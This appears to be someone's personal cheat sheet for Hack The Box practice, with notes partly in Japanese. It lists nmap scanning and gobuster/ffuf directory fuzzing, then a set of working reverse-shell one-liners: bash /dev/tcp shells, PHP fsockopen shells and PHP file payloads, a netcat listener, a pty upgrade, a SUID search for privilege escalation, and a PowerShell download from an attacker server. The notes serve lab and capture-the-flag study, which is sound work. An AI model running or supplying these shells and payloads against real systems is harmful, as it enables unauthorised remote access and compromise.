note about Hack The Box
cd /media/
sudo mount /dev/cdrom /media/cdrom1
cd /cdrom1
sudo ./VBoxLinuxAdditions.run
reboot
- Download ovpn file for VIP account
sudo openvpn --config ./Desktop/yufujioka.ovpn
- バージョン検出
nmap -sV rhost
- OS検出
nmap -O rhost
- OS 検出 + バージョン検出
nmap -A rhost
- ping 送らない
nmap -Pn rhost
- Vulnerability 検出
nmap --script=vuln -p rport1,rport2 rhost
- DNS
- dirb url -w
- Gobuster options
- Gobuster Cheatsheet
- quick play
gobuster dir -t 100 -u targetUrl -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o outfile
- ffuf
- quick play
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u targetUrl/FUZZ
- receive
nc -lnvp 1234
- bash
exec 5<>/dev/tcp/my_ip/my_port
/bin/bash -i >& /dev/tcp/my_ip/my_port 0>&1
/bin/bash -c "bash -i >& /dev/tcp/my_ip/my_port 0>&1"
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");
- Direct input
php -r '$sock=fsockopen("your.server.ip.address",1234);exec("/bin/bash -i <&3 >&3 2>&3");'
- PHP fsockopen
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
- Direct input
php -r '$s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");'
- when i get "must be run from a terminal"
python3 -c "import pty; pty.spawn('/bin/bash')"
find / -perm -u=s -type f 2>/dev/null
- whoami
$env:UserName
- 論理ドライブの一覧を表示
Get-PSDrive
- カレントドライブの移動
Set-Location C:
- Download file
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.22:8000/file','filename')"